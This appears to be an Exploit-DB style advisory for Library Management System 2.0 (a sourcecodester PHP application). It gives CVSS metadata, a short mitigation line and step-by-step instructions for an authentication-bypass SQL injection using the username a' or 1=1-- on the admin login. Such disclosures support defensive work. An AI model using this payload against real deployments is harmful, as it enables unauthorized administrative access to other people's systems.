Library Management System 2.0 - Auth Bypass SQL Injection

vendor:

Library Management System

by:

Manish Solanki

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Library Management System

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:library_management_system:2.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

2020

Library Management System 2.0 – Auth Bypass SQL Injection

Open the Application and check the URL http://localhost/eb_magalona_lms. Open Admin Login and enter username: a' or 1=1-- and password: ' and click on login. The SQL payload gets executed and authorization is bypassed successfully.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
# Date: 2020-12-09
# Exploit Author: Manish Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: admin page

#Exploit
Open the Application
check the URL:
http://localhost/eb_magalona_lms

Open Admin Login
Enter username: a' or 1=1--
Enter password: '

click on login
The SQL payload gets executed and authorization is bypassed successfully